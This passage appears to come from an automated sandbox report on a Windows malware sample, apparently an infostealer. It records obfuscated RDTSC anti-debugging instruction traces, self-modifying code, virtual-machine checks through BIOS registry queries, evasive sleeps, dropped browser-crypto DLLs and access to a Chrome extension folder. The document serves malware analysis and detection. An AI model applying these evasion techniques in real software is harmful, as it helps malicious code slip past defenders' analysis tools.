00007F742CC4420Eh 0x0000007c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C509A4 second address: 4C509A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C509A9 second address: 4C509DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007F742CC44212h 0x00000015 sub al, 00000058h 0x00000018 jmp 00007F742CC4420Bh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C509DB second address: 4C509E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 24351E7Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C509E5 second address: 4C50A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007F742CC44217h 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50A0C second address: 4C50A27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C000E5 second address: 4C000E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C000E9 second address: 4C000EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C000EF second address: 4C001CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC4420Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c jmp 00007F742CC44210h 0x00000011 xchg eax, ecx 0x00000012 jmp 00007F742CC44210h 0x00000017 push eax 0x00000018 pushad 0x00000019 mov edx, 31549EA4h 0x0000001e mov dx, 0110h 0x00000022 popad 0x00000023 xchg eax, ecx 0x00000024 pushad 0x00000025 mov edi, 7349E228h 0x0000002a pushfd 0x0000002b jmp 00007F742CC44211h 0x00000030 xor ch, FFFFFF96h 0x00000033 jmp 00007F742CC44211h 0x00000038 popfd 0x00000039 popad 0x0000003a xchg eax, ebx 0x0000003b jmp 00007F742CC4420Eh 0x00000040 push eax 0x00000041 jmp 00007F742CC4420Bh 0x00000046 xchg eax, ebx 0x00000047 pushad 0x00000048 call 00007F742CC44214h 0x0000004d mov ecx, 020B2C71h 0x00000052 pop ecx 0x00000053 jmp 00007F742CC44217h 0x00000058 popad 0x00000059 mov ebx, dword ptr [ebp+10h] 0x0000005c pushad 0x0000005d mov esi, 474621DBh 0x00000062 call 00007F742CC44210h 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C001CA second address: 4C001E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F742CEB81D3h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C001E6 second address: 4C0020C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C0020C second address: 4C00210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00210 second address: 4C00216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00216 second address: 4C0022B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CEB81D1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C0022B second address: 4C0022F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C0022F second address: 4C00240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00240 second address: 4C002FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 mov ecx, 325CF999h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, edi 0x0000000e pushad 0x0000000f mov cx, 42D1h 0x00000013 mov ebx, ecx 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 call 00007F742CC44214h 0x0000001d mov si, 7DB1h 0x00000021 pop ecx 0x00000022 popad 0x00000023 xchg eax, edi 0x00000024 jmp 00007F742CC4420Dh 0x00000029 test esi, esi 0x0000002b jmp 00007F742CC4420Eh 0x00000030 je 00007F749F3F258Bh 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F742CC4420Eh 0x0000003d sub ax, C9E8h 0x00000042 jmp 00007F742CC4420Bh 0x00000047 popfd 0x00000048 pushfd 0x00000049 jmp 00007F742CC44218h 0x0000004e add ecx, 09445C48h 0x00000054 jmp 00007F742CC4420Bh 0x00000059 popfd 0x0000005a popad 0x0000005b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F742CC44210h 0x0000006b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C002FE second address: 4C0030D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C0030D second address: 4C00365 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F749F3F2507h 0x0000000f jmp 00007F742CC4420Eh 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 jmp 00007F742CC44210h 0x0000001c or edx, dword ptr [ebp+0Ch] 0x0000001f pushad 0x00000020 call 00007F742CC4420Eh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00365 second address: 4C003BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dx, 3444h 0x00000009 popad 0x0000000a test edx, 61000000h 0x00000010 pushad 0x00000011 movsx edi, si 0x00000014 mov ecx, 6DCD1661h 0x00000019 popad 0x0000001a jne 00007F749F6664CFh 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F742CEB81D9h 0x00000029 or ecx, 33FAFEE6h 0x0000002f jmp 00007F742CEB81D1h 0x00000034 popfd 0x00000035 mov cx, 0D17h 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C003BF second address: 4C003DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC44218h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C003DB second address: 4C003F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F742CEB81CAh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C003F3 second address: 4C00405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC4420Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00405 second address: 4C00420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F749F666451h 0x00000011 pushad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00420 second address: 4C00431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov cl, 9Bh 0x00000007 popad 0x00000008 test bl, 00000007h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00431 second address: 4C00435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00435 second address: 4C00447 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC4420Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00447 second address: 4C0044D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0805 second address: 4BF0842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 7004h 0x00000007 push edi 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F742CC44216h 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F742CC44217h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0842 second address: 4BF0848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0848 second address: 4BF084C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF084C second address: 4BF0850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0850 second address: 4BF0891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F742CC44217h 0x0000000f and esp, FFFFFFF8h 0x00000012 jmp 00007F742CC44216h 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0891 second address: 4BF0895 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0895 second address: 4BF089B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF089B second address: 4BF08F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F742CEB81D2h 0x00000008 call 00007F742CEB81D2h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 mov ax, 0A49h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d movzx esi, dx 0x00000020 mov eax, edx 0x00000022 popad 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F742CEB81D5h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF08F0 second address: 4BF090E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF090E second address: 4BF0921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0921 second address: 4BF0974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F742CC4420Fh 0x00000009 add ecx, 634C176Eh 0x0000000f jmp 00007F742CC44219h 0x00000014 popfd 0x00000015 mov bl, al 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov esi, dword ptr [ebp+08h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F742CC44216h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0974 second address: 4BF09E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007F742CEB81CFh 0x00000010 test esi, esi 0x00000012 jmp 00007F742CEB81D6h 0x00000017 je 00007F749F66DBA8h 0x0000001d pushad 0x0000001e pushad 0x0000001f jmp 00007F742CEB81CCh 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 popad 0x00000028 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F742CEB81D8h 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF09E5 second address: 4BF0A17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC4420Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b jmp 00007F742CC44216h 0x00000010 je 00007F749F3F9B9Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0A17 second address: 4BF0A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, dx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0A1F second address: 4BF0AA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 pushfd 0x00000007 jmp 00007F742CC44217h 0x0000000c adc ecx, 4EA0A50Eh 0x00000012 jmp 00007F742CC44219h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test byte ptr [77436968h], 00000002h 0x00000022 jmp 00007F742CC4420Eh 0x00000027 jne 00007F749F3F9B47h 0x0000002d pushad 0x0000002e jmp 00007F742CC4420Eh 0x00000033 mov esi, 7E644C91h 0x00000038 popad 0x00000039 mov edx, dword ptr [ebp+0Ch] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F742CC44213h 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0AA8 second address: 4BF0AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CEB81D4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0AC0 second address: 4BF0AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0AC4 second address: 4BF0BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F742CEB81CCh 0x0000000e mov dword ptr [esp], ebx 0x00000011 jmp 00007F742CEB81D0h 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 jmp 00007F742CEB81CEh 0x0000001d mov ebx, esi 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F742CEB81D7h 0x00000026 xchg eax, ebx 0x00000027 jmp 00007F742CEB81D6h 0x0000002c push dword ptr [ebp+14h] 0x0000002f pushad 0x00000030 call 00007F742CEB81CEh 0x00000035 movzx esi, dx 0x00000038 pop edx 0x00000039 jmp 00007F742CEB81CCh 0x0000003e popad 0x0000003f push dword ptr [ebp+10h] 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007F742CEB81CDh 0x0000004b sub ecx, 123DF036h 0x00000051 jmp 00007F742CEB81D1h 0x00000056 popfd 0x00000057 pushfd 0x00000058 jmp 00007F742CEB81D0h 0x0000005d jmp 00007F742CEB81D5h 0x00000062 popfd 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0C2C second address: 4BF0C92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F742CC4420Ch 0x00000012 jmp 00007F742CC44215h 0x00000017 popfd 0x00000018 jmp 00007F742CC44210h 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F742CC44217h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0C92 second address: 4BF0C98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46DC2F second address: 46DC55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44217h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F742CC44206h 0x00000014 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Special instruction interceptor: First address: 2BCAC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Special instruction interceptor: First address: 464043 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Special instruction interceptor: First address: 46962A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Special instruction interceptor: First address: 2BCA3E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Special instruction interceptor: First address: 4EF68F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 28CAC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 434043 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 43962A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 28CA3E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 4BF68F instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Code function: 8_2_04C70C55 rdtsc 8_2_04C70C55
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3583 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 1759 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 1189 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 1098 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 353 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 548 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Window / User API: threadDelayed 657 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe API coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe TID: 3640 Thread sleep count: 189 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 1976 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 2784 Thread sleep count: 1189 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 2784 Thread sleep time: -2379189s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 2156 Thread sleep count: 1098 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 2156 Thread sleep time: -2197098s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 6912 Thread sleep count: 353 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 6912 Thread sleep time: -10590000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 7260 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 7128 Thread sleep count: 548 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 7128 Thread sleep time: -1096548s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe TID: 7360 Thread sleep count: 657 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe TID: 7360 Thread sleep count: 275 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7DC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C7DC930
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
